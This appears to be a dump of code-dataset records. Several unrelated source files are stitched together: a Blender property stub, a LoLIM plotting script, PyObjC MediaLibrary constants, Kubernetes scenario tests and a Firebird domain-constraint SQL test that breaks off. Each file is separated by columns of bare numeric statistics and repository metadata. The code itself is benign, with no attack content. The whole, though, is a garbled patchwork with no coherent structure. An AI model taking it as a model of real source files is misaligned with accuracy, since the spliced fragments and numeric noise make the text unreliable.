@subtype (string): Enumerator in ['COLOR', 'TRANSLATION', 'DIRECTION', 'VELOCITY', 'ACCELERATION', 'MATRIX', 'EULER', 'QUATERNION', 'AXISANGLE', 'XYZ', 'COLOR_GAMMA', 'LAYER', 'NONE'].
@size (int): Vector dimensions in [1, and 32].
@update (function): function to be called when this value is modified,This function must take 2 values (self, context) and return None.
*Warning* there are no safety checks to avoid infinite recursion.
'''
pass
def PointerProperty(type="", description="", options={'ANIMATABLE'}, update=None):
'''Returns a new pointer property definition.
Arguments:
@type (class): A subclass of bpy.types.PropertyGroup.
@name (string): Name used in the user interface.
@description (string): Text used for the tooltip and api documentation.
@options (set): Enumerator in ['HIDDEN', 'SKIP_SAVE', 'ANIMATABLE', 'LIBRARY_EDITABLE'].
@update (function): function to be called when this value is modified,This function must take 2 values (self, context) and return None.
*Warning* there are no safety checks to avoid infinite recursion.
'''
pass
def RemoveProperty(cls, attr):
'''Removes a dynamically defined property.
Arguments:
@cls (type): The class containing the property (must be a positional argument).
@attr (string): Property name (must be passed as a keyword).
Note: Typically this function doesn't need to be accessed directly.Instead use del cls.attr
'''
pass
def StringProperty(name="", description="", default="", maxlen=0, options={'ANIMATABLE'}, subtype='NONE', update=None, get=None, set=None):
'''Returns a new string property definition.
Arguments:
@name (string): Name used in the user interface.
@description (string): Text used for the tooltip and api documentation.
@options (set): Enumerator in ['HIDDEN', 'SKIP_SAVE', 'ANIMATABLE', 'LIBRARY_EDITABLE'].
@subtype (string): Enumerator in ['FILE_PATH', 'DIR_PATH', 'FILE_NAME', 'NONE'].
@update (function): function to be called when this value is modified,This function must take 2 values (self, context) and return None.
*Warning* there are no safety checks to avoid infinite recursion.
'''
pass
| 52.204082
| 283
| 0.666243
| 1,286
| 10,232
| 5.266719
| 0.16563
| 0.033663
| 0.016241
| 0.026576
| 0.781781
| 0.773808
| 0.766573
| 0.766573
| 0.759781
| 0.754614
| 0
| 0.004951
| 0.210321
| 10,232
| 195
| 284
| 52.471795
| 0.833292
| 0.717651
| 0
| 0.5
| 0
| 0
| 0.069915
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.5
| false
| 0.5
| 0
| 0
| 0.5
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 0
| 0
|
0
| 7
|
044e6d4fc9ca5f81b49f92138b1e644da6b0cdeb
| 1,965
|
py
|
Python
|
LIM_scripts/stationTimings/examples/plot_pulse.py
|
Bhare8972/LOFAR-LIM
|
89f25be8c02cb8980c2e237da3eaac279d40a06a
|
[
"MIT"
] | 3
|
2019-04-21T13:13:02.000Z
|
2020-10-15T12:44:23.000Z
|
LIM_scripts/stationTimings/examples/plot_pulse.py
|
Bhare8972/LOFAR-LIM
|
89f25be8c02cb8980c2e237da3eaac279d40a06a
|
[
"MIT"
] | null | null | null |
LIM_scripts/stationTimings/examples/plot_pulse.py
|
Bhare8972/LOFAR-LIM
|
89f25be8c02cb8980c2e237da3eaac279d40a06a
|
[
"MIT"
] | 2
|
2018-11-06T18:34:33.000Z
|
2019-04-04T14:16:57.000Z
|
#!/usr/bin/env python3
from run_Fitter4 import *
from LoLIM.stationTimings.timingInspector_4 import plot_all_stations, plot_station
#plot_all_stations(40,
#
# timeID = "D20180809T141413.250Z",
# output_folder = "Callibration_1",
# pulse_input_folders = ['pulse_finding'],
# guess_timings = guess_timings,
# sources_to_fit = known_sources, ## NOTE: that the index here is file_index + source_index*10
# guess_source_locations = guess_source_locations,
# source_polarizations = known_polarizations, ## NOTE: 0 is even, 1 is odd, 2 is both
# source_stations_to_exclude = stations_to_exclude,
# source_antennas_to_exclude = antennas_to_exclude,
# bad_ants = bad_antennas,
# antennas_to_recalibrate = antennas_to_recallibrate,
# min_ant_amplitude = 10,
# ref_station = "CS002")
plot_station(110,
'CS002',
True,
timeID = "D20180809T141413.250Z",
output_folder = "Callibration_1",
pulse_input_folders = ['pulse_finding'],
guess_timings = guess_timings,
sources_to_fit = known_sources, ## NOTE: that the index here is file_index + source_index*10
guess_source_locations = guess_source_locations,
source_polarizations = known_polarizations, ## NOTE: 0 is even, 1 is odd, 2 is both
source_stations_to_exclude = stations_to_exclude,
source_antennas_to_exclude = antennas_to_exclude,
bad_ants = bad_antennas,
antennas_to_recalibrate = antennas_to_recallibrate,
min_ant_amplitude = 10,
ref_station = "CS002")
| 50.384615
| 118
| 0.570483
| 194
| 1,965
| 5.35567
| 0.324742
| 0.069297
| 0.076997
| 0.061598
| 0.858518
| 0.858518
| 0.858518
| 0.858518
| 0.858518
| 0.858518
| 0
| 0.053729
| 0.365394
| 1,965
| 38
| 119
| 51.710526
| 0.779471
| 0.50229
| 0
| 0
| 0
| 0
| 0.060797
| 0.022013
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0.111111
| 0
| 0.111111
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
0b03b42790270534ef8b3be7c9668a4a3293b394
| 5,738
|
py
|
Python
|
env/lib/python3.10/site-packages/MediaLibrary/_metadata.py
|
Arcfrost/MyBlog---TextToSpeech
|
861db3881fde00397a9b826c900fa96f5c5d9ae4
|
[
"MIT"
] | null | null | null |
env/lib/python3.10/site-packages/MediaLibrary/_metadata.py
|
Arcfrost/MyBlog---TextToSpeech
|
861db3881fde00397a9b826c900fa96f5c5d9ae4
|
[
"MIT"
] | null | null | null |
env/lib/python3.10/site-packages/MediaLibrary/_metadata.py
|
Arcfrost/MyBlog---TextToSpeech
|
861db3881fde00397a9b826c900fa96f5c5d9ae4
|
[
"MIT"
] | null | null | null |
# This file is generated by objective.metadata
#
# Last update: Sun Jul 11 21:41:10 2021
#
# flake8: noqa
import objc, sys
if sys.maxsize > 2 ** 32:
def sel32or64(a, b):
return b
else:
def sel32or64(a, b):
return a
if objc.arch == "arm64":
def selAorI(a, b):
return a
else:
def selAorI(a, b):
return b
misc = {}
constants = """$MLApertureAllPhotosTypeIdentifier$MLApertureAllProjectsTypeIdentifier$MLApertureFacebookAlbumTypeIdentifier$MLApertureFacebookGroupTypeIdentifier$MLApertureFacesAlbumTypeIdentifier$MLApertureFlaggedTypeIdentifier$MLApertureFlickrAlbumTypeIdentifier$MLApertureFlickrGroupTypeIdentifier$MLApertureFolderAlbumTypeIdentifier$MLApertureLastImportAlbumTypeIdentifier$MLApertureLastNMonthsAlbumTypeIdentifier$MLApertureLastViewedEventAlbumTypeIdentifier$MLApertureLightTableTypeIdentifier$MLAperturePhotoStreamAlbumTypeIdentifier$MLAperturePlacesAlbumTypeIdentifier$MLAperturePlacesCityAlbumTypeIdentifier$MLAperturePlacesCountryAlbumTypeIdentifier$MLAperturePlacesPointOfInterestAlbumTypeIdentifier$MLAperturePlacesProvinceAlbumTypeIdentifier$MLApertureProjectAlbumTypeIdentifier$MLApertureProjectFolderAlbumTypeIdentifier$MLApertureRootGroupTypeIdentifier$MLApertureSlideShowTypeIdentifier$MLApertureSmugMugAlbumTypeIdentifier$MLApertureSmugMugGroupTypeIdentifier$MLApertureUserAlbumTypeIdentifier$MLApertureUserSmartAlbumTypeIdentifier$MLFinalCutEventCalendarGroupTypeIdentifier$MLFinalCutEventGroupTypeIdentifier$MLFinalCutEventLibraryGroupTypeIdentifier$MLFinalCutFolderGroupTypeIdentifier$MLFinalCutProjectGroupTypeIdentifier$MLFinalCutRootGroupTypeIdentifier$MLFolderGroupTypeIdentifier$MLFolderRootGroupTypeIdentifier$MLGarageBandFolderGroupTypeIdentifier$MLGarageBandRootGroupTypeIdentifier$MLLogicBouncesGroupTypeIdentifier$MLLogicProjectTypeIdentifier$MLLogicProjectsGroupTypeIdentifier$MLLogicRootGroupTypeIdentifier$MLMediaLoadAppFoldersKey$MLMediaLoadAppleLoops$MLMediaLoadExcludeSourcesKey$MLMediaLoadFoldersKey$MLMediaLoadIncludeSourcesKey$MLMediaLoadMoviesFolder$MLMediaLoadSourceTypesKey$MLMediaObjectAlbumKey$MLMediaObjectArtistKey$MLMediaObjectBitRateKey$MLMediaObjectChannelCountKey$MLMediaObjectCommentsKey$MLMediaObjectDurationKey$MLMediaObjectGenreKey$MLMediaObjectKeywordsKey$MLMediaObjectKindKey$MLMediaObjectProtectedKey$MLMediaObjectResolutionStringKey$MLMediaObjectSampleRateKey$MLMediaObjectTrackNumberKey$MLMediaSourceApertureIdentifier$MLMediaSourceAppDefinedFoldersIdentifier$MLMediaSourceCustomFoldersIdentifier$MLMediaSourceFinalCutIdentifier$MLMediaSourceGarageBandIdentifier$MLMediaSourceLogicIdentifier$MLMediaSourceMoviesFolderIdentifier$MLMediaSourcePhotoBoothIdentifier$MLMediaSourcePhotosIdentifier$MLMediaSourceiMovieIdentifier$MLMediaSourceiPhotoIdentifier$MLMediaSourceiTunesIdentifier$MLPhotosAlbumTypeIdentifier$MLPhotosAlbumsGroupTypeIdentifier$MLPhotosAllCollectionsGroupTypeIdentifier$MLPhotosAllMomentsGroupTypeIdentifier$MLPhotosAllPhotosAlbumTypeIdentifier$MLPhotosAllYearsGroupTypeIdentifier$MLPhotosAnimatedGroupTypeIdentifier$MLPhotosBurstGroupTypeIdentifier$MLPhotosCollectionGroupTypeIdentifier$MLPhotosDepthEffectGroupTypeIdentifier$MLPhotosFacesAlbumTypeIdentifier$MLPhotosFavoritesGroupTypeIdentifier$MLPhotosFolderTypeIdentifier$MLPhotosFrontCameraGroupTypeIdentifier$MLPhotosLastImportGroupTypeIdentifier$MLPhotosLivePhotosGroupTypeIdentifier$MLPhotosLongExposureGroupTypeIdentifier$MLPhotosMomentGroupTypeIdentifier$MLPhotosMyPhotoStreamTypeIdentifier$MLPhotosPanoramasGroupTypeIdentifier$MLPhotosPublishedAlbumTypeIdentifier$MLPhotosRootGroupTypeIdentifier$MLPhotosScreenshotGroupTypeIdentifier$MLPhotosSharedGroupTypeIdentifier$MLPhotosSharedPhotoStreamTypeIdentifier$MLPhotosSloMoGroupTypeIdentifier$MLPhotosSmartAlbumTypeIdentifier$MLPhotosTimelapseGroupTypeIdentifier$MLPhotosVideosGroupTypeIdentifier$MLPhotosYearGroupTypeIdentifier$MLiMovieEventCalendarGroupTypeIdentifier$MLiMovieEventGroupTypeIdentifier$MLiMovieEventLibraryGroupTypeIdentifier$MLiMovieFolderGroupTypeIdentifier$MLiMovieProjectGroupTypeIdentifier$MLiMovieRootGroupTypeIdentifier$MLiPhotoAlbumTypeIdentifier$MLiPhotoEventAlbumTypeIdentifier$MLiPhotoEventsFolderTypeIdentifier$MLiPhotoFacebookAlbumTypeIdentifier$MLiPhotoFacebookGroupTypeIdentifier$MLiPhotoFacesAlbumTypeIdentifier$MLiPhotoFlaggedAlbumTypeIdentifier$MLiPhotoFlickrAlbumTypeIdentifier$MLiPhotoFlickrGroupTypeIdentifier$MLiPhotoFolderAlbumTypeIdentifier$MLiPhotoLastImportAlbumTypeIdentifier$MLiPhotoLastNMonthsAlbumTypeIdentifier$MLiPhotoLastViewedEventAlbumTypeIdentifier$MLiPhotoLibraryAlbumTypeIdentifier$MLiPhotoPhotoStreamAlbumTypeIdentifier$MLiPhotoPlacesAlbumTypeIdentifier$MLiPhotoPlacesCityAlbumTypeIdentifier$MLiPhotoPlacesCountryAlbumTypeIdentifier$MLiPhotoPlacesPointOfInterestAlbumTypeIdentifier$MLiPhotoPlacesProvinceAlbumTypeIdentifier$MLiPhotoRootGroupTypeIdentifier$MLiPhotoSlideShowAlbumTypeIdentifier$MLiPhotoSmartAlbumTypeIdentifier$MLiPhotoSubscribedAlbumTypeIdentifier$MLiTunesAudioBooksPlaylistTypeIdentifier$MLiTunesFolderPlaylistTypeIdentifier$MLiTunesGeniusPlaylistTypeIdentifier$MLiTunesMoviesPlaylistTypeIdentifier$MLiTunesMusicPlaylistTypeIdentifier$MLiTunesMusicVideosPlaylistTypeIdentifier$MLiTunesPlaylistTypeIdentifier$MLiTunesPodcastPlaylistTypeIdentifier$MLiTunesPurchasedPlaylistTypeIdentifier$MLiTunesRootGroupTypeIdentifier$MLiTunesSavedGeniusPlaylistTypeIdentifier$MLiTunesSmartPlaylistTypeIdentifier$MLiTunesTVShowsPlaylistTypeIdentifier$MLiTunesVideoPlaylistTypeIdentifier$MLiTunesiTunesUPlaylistTypeIdentifier$"""
enums = """$MLMediaSourceTypeAudio@1$MLMediaSourceTypeImage@2$MLMediaSourceTypeMovie@4$MLMediaTypeAudio@1$MLMediaTypeImage@2$MLMediaTypeMovie@4$"""
misc.update({})
expressions = {}
# END OF FILE
| 143.45
| 5,167
| 0.936738
| 225
| 5,738
| 23.888889
| 0.871111
| 0.001488
| 0.005953
| 0.005209
| 0.01414
| 0
| 0
| 0
| 0
| 0
| 0
| 0.005711
| 0.023527
| 5,738
| 39
| 5,168
| 147.128205
| 0.953596
| 0.018648
| 0
| 0.555556
| 1
| 0.111111
| 0.940078
| 0.939189
| 0
| 0
| 0
| 0
| 0
| 1
| 0.222222
| false
| 0
| 0.111111
| 0.222222
| 0.555556
| 0
| 0
| 0
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 1
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 1
| 1
| 0
|
0
| 9
|
0b0464422e5e83a92b6fb4da4a2c75653c08211b
| 4,176
|
py
|
Python
|
tests/test_scenarios.py
|
KellyGriffin/kalc
|
9b78c4177ed9ffccbf1ecfbf9a7946286cd7c583
|
[
"Apache-2.0"
] | null | null | null |
tests/test_scenarios.py
|
KellyGriffin/kalc
|
9b78c4177ed9ffccbf1ecfbf9a7946286cd7c583
|
[
"Apache-2.0"
] | null | null | null |
tests/test_scenarios.py
|
KellyGriffin/kalc
|
9b78c4177ed9ffccbf1ecfbf9a7946286cd7c583
|
[
"Apache-2.0"
] | null | null | null |
from tests.libs_for_tests import *
import pytest
pytestmark = pytest.mark.skip # TODO DELETEME
# # @pytest.mark.skip(reason="temporary skip")
# def test_OptimisticRun_wo_cli():
# run_dir_wo_cli(TEST_CLUSTER_FOLDER, TEST_DAEMONSET)
# @pytest.mark.skip(reason="temporary skip")
# def test_OptimisticRun_cli_direct():
# run_cli_directly(TEST_CLUSTER_FOLDER, TEST_DAEMONSET)
# # @pytest.mark.skip(reason="temporary skip")
# def test_OptimisticRun_cli_invoke():
# run_cli_invoke(TEST_CLUSTER_FOLDER, TEST_DAEMONSET)
print("test_has_deployment_creates_daemonset__pods_evicted_pods_pending")
def test_1_step_1_wo_cli():
run_wo_cli(DUMP1_S1_H_S2_Z_FREE_200,CHANGE_DAEMONSET_HIGH)
def test_has_deployment_creates_daemonset__pods_evicted_pods_pending_wo_cli():
run_wo_cli(DUMP1_S1_H_S2_Z_FREE_200,CHANGE_DAEMONSET_HIGH)
@pytest.mark.debug(reason="temporary skip")
def test_has_deployment_creates_daemonset__pods_evicted_pods_pending_cli_direct():
run_cli_directly(DUMP1_S1_H_S2_Z_FREE_200,CHANGE_DAEMONSET_HIGH)
# @pytest.mark.skip(reason="temporary skip")
def test_has_deployment_creates_daemonset__pods_evicted_pods_pending_cli_invoke():
run_cli_invoke(DUMP1_S1_H_S2_Z_FREE_200,CHANGE_DAEMONSET_HIGH)
print("test_creates_deployment_but_insufficient_resource__pods_pending")
def test_creates_deployment_but_insufficient_resource__pods_pending_wo_cli():
run_wo_cli(DUMP1_S1_H_S2_Z_FREE_200,CHANGE_DEPLOYMENT_ZERO)
@pytest.mark.debug(reason="temporary skip")
def test_creates_deployment_but_insufficient_resource__pods_pending_cli_direct():
run_cli_directly(DUMP1_S1_H_S2_Z_FREE_200,CHANGE_DEPLOYMENT_ZERO)
# @pytest.mark.skip(reason="temporary skip")
def test_creates_deployment_but_insufficient_resource__pods_pending_cli_invoke():
run_cli_invoke(DUMP1_S1_H_S2_Z_FREE_200,CHANGE_DEPLOYMENT_ZERO)
print("test_creates_service_and_deployment_insufficient_resource__service_outage")
def test_creates_service_and_deployment_insufficient_resource__service_outage_wo_cli():
run_wo_cli(DUMP1_S1_H_S2_Z_FREE_200,CHANGE_DEPLOYMENT_ZERO_WITH_SERVICE)
@pytest.mark.debug(reason="temporary skip")
def test_creates_service_and_deployment_insufficient_resource__service_outageg_cli_direct():
run_cli_directly(DUMP1_S1_H_S2_Z_FREE_200,CHANGE_DEPLOYMENT_ZERO_WITH_SERVICE)
# @pytest.mark.skip(reason="temporary skip")
def test_creates_service_and_deployment_insufficient_resource__service_outage_cli_invoke():
run_cli_invoke(DUMP1_S1_H_S2_Z_FREE_200,CHANGE_DEPLOYMENT_ZERO_WITH_SERVICE)
print(" has_deployment_creates_deployment__pods_evicted_pods_pending")
logger.info("----- has_deployment_creates_deployment__pods_evicted_pods_pending:")
def test_has_deployment_creates_deployment__pods_evicted_pods_pending_wo_cli():
run_wo_cli(DUMP1_S1_H_S2_Z_FREE_200,CHANGE_DEPLOYMENT_HIGH)
@pytest.mark.skip(reason="temporary skip")
def test_has_deployment_creates_deployment__pods_evicted_pods_pending_cli_direct():
run_cli_directly(DUMP1_S1_H_S2_Z_FREE_200,CHANGE_DEPLOYMENT_HIGH)
# @pytest.mark.skip(reason="temporary skip")
def test_has_deployment_creates_deployment__pods_evicted_pods_pending_cli_invoke():
run_cli_invoke(DUMP1_S1_H_S2_Z_FREE_200,CHANGE_DEPLOYMENT_HIGH)
# print(" has_daemonset_creates_deployment__pods_pending_high_severity")
# #Customer has a DaemonSet, creates a Deployment with higher priority,
# # one of the pods for DaemonSet gets evicted => we detect a high-severity
# # issue (because DaemonSet only has 1 pod per node working)
# def test_has_daemonset_creates_deployment__pods_pending_high_severity_wo_cli():
# run_wo_cli(DUMP_S1_HIGH_PRIORITY_S2_ZERO_PRIORITY_WITH_DAEMONSET_ZERO, CHANGE_DEPLOYMENT_HIGH)
# @pytest.mark.skip(reason="temporary skip")
# def test_has_daemonset_creates_deployment__pods_pending_high_severity_cli_direct():
# run_cli_directly(DUMP_S1_HIGH_PRIORITY_S2_ZERO_PRIORITY_WITH_DAEMONSET_ZERO, CHANGE_DEPLOYMENT_HIGH)
# # @pytest.mark.skip(reason="temporary skip")
# def test_has_daemonset_creates_deployment__pods_pending_high_severity_cli_invoke():
# run_cli_invoke(DUMP_S1_HIGH_PRIORITY_S2_ZERO_PRIORITY_WITH_DAEMONSET_ZERO, CHANGE_DEPLOYMENT_HIGH)
| 56.432432
| 107
| 0.863266
| 629
| 4,176
| 5.065183
| 0.119237
| 0.041745
| 0.077527
| 0.089768
| 0.906466
| 0.869115
| 0.866918
| 0.866918
| 0.799121
| 0.724733
| 0
| 0.022319
| 0.066571
| 4,176
| 74
| 108
| 56.432432
| 0.795023
| 0.363745
| 0
| 0.131579
| 0
| 0
| 0.146286
| 0.122286
| 0
| 0
| 0
| 0.013514
| 0
| 1
| 0.342105
| false
| 0
| 0.052632
| 0
| 0.394737
| 0.105263
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
9bf95b11799633edd4b4e983fef0b9720514d8cb
| 48,293
|
py
|
Python
|
tests/functional/gtcs/test_dsql_domain_07.py
|
FirebirdSQL/firebird-qa
|
96af2def7f905a06f178e2a80a2c8be4a4b44782
|
[
"MIT"
] | 1
|
2022-02-05T11:37:13.000Z
|
2022-02-05T11:37:13.000Z
|
tests/functional/gtcs/test_dsql_domain_07.py
|
FirebirdSQL/firebird-qa
|
96af2def7f905a06f178e2a80a2c8be4a4b44782
|
[
"MIT"
] | 1
|
2021-09-03T11:47:00.000Z
|
2021-09-03T12:42:10.000Z
|
tests/functional/gtcs/test_dsql_domain_07.py
|
FirebirdSQL/firebird-qa
|
96af2def7f905a06f178e2a80a2c8be4a4b44782
|
[
"MIT"
] | 1
|
2021-06-30T14:14:16.000Z
|
2021-06-30T14:14:16.000Z
|
#coding:utf-8
#
# id: functional.gtcs.dsql_domain_07
# title: GTCS/tests/DSQL_DOMAIN_07. Test CREATE / ALTER domain statement with ADD/DROP CONSTRAINT clauses, together and separately.
# decription:
# Original test see in:
# https://github.com/FirebirdSQL/fbtcs/blob/master/GTCS/tests/DSQL_DOMAIN_07.script
#
# NB: avoid usage of ISQL command 'SHOW DOMAIN' because of unstable output.
# We display info about domains using common VIEW based on RDB$FIELDS table.
# Columns with rdb$validation_source and rdb$default_source contain BLOB data thus we have to skip from showing their blob ID - see substitution.
#
# ::: NOTE :::
# Added domains with datatype that did appear only in FB 4.0: DECFLOAT and TIME[STAMP] WITH TIME ZONE. For this reason only FB 4.0+ can be tested.
#
# For each base datatype we:
# * create domain and set initial CHECK constraint;
# * alter domain in order to add new constraint. This must FAIL with message "Only one constraint allowed for a domain" (SQLSTATE = 42000)
# * alter domain with requirement ADD CONSTRAINT and DROP it.
# ##########
# ### NB ### Clause 'DROP CONSTRAINT' will be executed FIRST in this case, regardless where it is specified.
# ##########
# For this reason such statement must PASS.
# * alter domain and try to add again new CHECK constraint. This thould fail again with SQLSTATE=42000.
#
# Currently following datatypes are NOT checked:
# blob sub_type text not null;
# blob sub_type binary not null; // byt test *does* check BLOB without sub_type specified
# long float not null;
# nchar not null;
# binary not null;
# varbinary not null;
#
# Checked on 4.0.0.1931.
#
# tracker_id:
# min_versions: ['4.0']
# versions: 4.0
# qmid: None
import pytest
from firebird.qa import db_factory, isql_act, Action
# version: 4.0
# resources: None
substitutions_1 = [('[ \t]+', ' '), ('DM_FDEFAULT_BLOB_ID.*', ''), ('DM_FVALID_BLOB_ID.*', '')]
init_script_1 = """"""
db_1 = db_factory(sql_dialect=3, init=init_script_1)
test_script_1 = """
set list on;
create view v_test as
select
ff.rdb$field_name as dm_name
,ff.rdb$field_type as dm_type
,ff.rdb$field_sub_type as dm_subtype
,ff.rdb$field_length as dm_flen
,ff.rdb$field_scale as dm_fscale
,ff.rdb$field_precision as dm_fprec
,ff.rdb$character_set_id as dm_fcset
,ff.rdb$collation_id as dm_fcoll
,ff.rdb$character_length dm_fchrlen
,ff.rdb$null_flag as dm_fnull
,ff.rdb$validation_source as dm_fvalid_blob_id
,ff.rdb$default_source as dm_fdefault_blob_id
from rdb$fields ff
where
ff.rdb$system_flag is distinct from 1
and ff.rdb$field_name starting with upper( 'dom0' )
;
commit;
create domain dom06_01 as smallint check( value = 1 );
alter domain dom06_01 add constraint check( value = 2 ); -- must fail: "Only one constraint allowed for a domain"
alter domain dom06_01 add constraint check( value = 3 ) drop constraint; -- drop will run FIRST here! Statement must PASS!
alter domain dom06_01 add constraint check( value = 4 ); -- must fail
------------------------------------------------------------------------------------------------
create domain dom06_02 as int check( value = 1 );
alter domain dom06_02 add constraint check( value = 2 );
alter domain dom06_02 add constraint check( value = 3 ) drop constraint;
alter domain dom06_02 add constraint check( value = 4 );
------------------------------------------------------------------------------------------------
create domain dom06_03 as bigint check( value = 1 );
alter domain dom06_03 add constraint check( value = 2 );
alter domain dom06_03 add constraint check( value = 3 ) drop constraint;
alter domain dom06_03 add constraint check( value = 4 );
------------------------------------------------------------------------------------------------
create domain dom06_04 as date check( value <= current_date );
alter domain dom06_04 add constraint check( value = current_date );
alter domain dom06_04 add constraint check( value < current_date ) drop constraint;
alter domain dom06_04 add constraint check( value > current_date );
------------------------------------------------------------------------------------------------
create domain dom06_05 as time check( value <= current_time );
alter domain dom06_05 add constraint check( value = current_time );
alter domain dom06_05 add constraint check( value < current_time ) drop constraint;
alter domain dom06_05 add constraint check( value > current_time );
------------------------------------------------------------------------------------------------
create domain dom06_06 as time with time zone check( value >= '11:11:11.111 Indian/Cocos');
alter domain dom06_06 add constraint check( value >= '12:31:42.543 Pacific/Fiji' );
alter domain dom06_06 add constraint check( value < '23:34:45.678 Pacific/Galapagos' ) drop constraint;
alter domain dom06_06 add constraint check( value > '01:02:03.456 Antarctica/South_Pole' );
------------------------------------------------------------------------------------------------
create domain dom06_07 as time check( value <= current_timestamp );
alter domain dom06_07 add constraint check( value = current_timestamp );
alter domain dom06_07 add constraint check( value < current_timestamp ) drop constraint;
alter domain dom06_07 add constraint check( value > current_timestamp );
------------------------------------------------------------------------------------------------
create domain dom06_08 as timestamp with time zone check( value >= '21.12.2013 11:11:11.111 Indian/Cocos' );
alter domain dom06_08 add constraint check( value >= '23.01.2014 12:31:42.543 Pacific/Fiji' );
alter domain dom06_08 add constraint check( value < '27.03.2015 23:34:45.678 Pacific/Galapagos' ) drop constraint;
alter domain dom06_08 add constraint check( value > '29.05.2017 01:02:03.456 Antarctica/South_Pole' );
------------------------------------------------------------------------------------------------
create domain dom06_09 as char(1) character set utf8 check( value = '€');
alter domain dom06_09 add constraint check( value = '£' );
alter domain dom06_09 add constraint check( value = '¢' ) drop constraint;
alter domain dom06_09 add constraint check( value = '¥' );
------------------------------------------------------------------------------------------------
create domain dom06_10 as varchar(1) character set utf8 check( value = '€');
alter domain dom06_10 add constraint check( value = '£' );
alter domain dom06_10 add constraint check( value = '¢' ) drop constraint;
alter domain dom06_10 add constraint check( value = '¥' );
------------------------------------------------------------------------------------------------
create domain dom06_11 as nchar(1) check( value = 'Ž'); -- ISO8859_1
alter domain dom06_11 add constraint check( value = 'š' );
alter domain dom06_11 add constraint check( value = 'Ÿ' ) drop constraint;
alter domain dom06_11 add constraint check( value = '¡' );
------------------------------------------------------------------------------------------------
create domain dom06_12 as numeric(2,2) check(value = -327.68);
alter domain dom06_12 add constraint check( value = 327.67 );
alter domain dom06_12 add constraint check( value = -327.68 ) drop constraint;
alter domain dom06_12 add constraint check( value = 327.67 );
------------------------------------------------------------------------------------------------
create domain dom06_13 as decimal(2,2) check(value = -327.68);
alter domain dom06_13 add constraint check( value = 327.67 );
alter domain dom06_13 add constraint check( value = -327.68 ) drop constraint;
alter domain dom06_13 add constraint check( value = 327.67 );
------------------------------------------------------------------------------------------------
create domain dom06_14 as float check(value < 340282346638528859811704183484516925440);
alter domain dom06_14 add constraint check( value = 327.67 );
alter domain dom06_14 add constraint check( value = 1.40129846432481707092372958328991613128026194187651577175706828388979108268586060148663818836212158203125e-45 ) drop constraint;
alter domain dom06_14 add constraint check( value = 0.999999940395355224609375 );
------------------------------------------------------------------------------------------------
create domain dom06_15 as float check(value < 340282346638528859811704183484516925440);
alter domain dom06_15 add constraint check( value = 327.67 );
alter domain dom06_15 add constraint check( value = 1.40129846432481707092372958328991613128026194187651577175706828388979108268586060148663818836212158203125e-45 ) drop constraint;
alter domain dom06_15 add constraint check( value = 0.999999940395355224609375 );
------------------------------------------------------------------------------------------------
create domain dom06_16 as double precision check(value < 1.797693134862315708e308);
alter domain dom06_16 add constraint check( value = 327.67 );
alter domain dom06_16 add constraint check( value >= 2e-308 ) drop constraint;
alter domain dom06_16 add constraint check( value = 1.0000000000000002220446049250313080847263336181640625 );
-----------------------------------------------------------------------------------------------
create domain dom06_17 as blob check (value =
'
0123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789
0123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789
0123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789
0123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789
0123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789
0123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789
0123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789
0123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789
0123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789
0123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789
0123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789
0123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789
0123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789
0123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789
0123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789
0123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789
0123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789
0123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789
0123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789
0123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789
0123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789
0123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789
0123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789
0123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789
0123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789
0123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789
0123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789
0123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789
0123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789
0123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789
0123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789
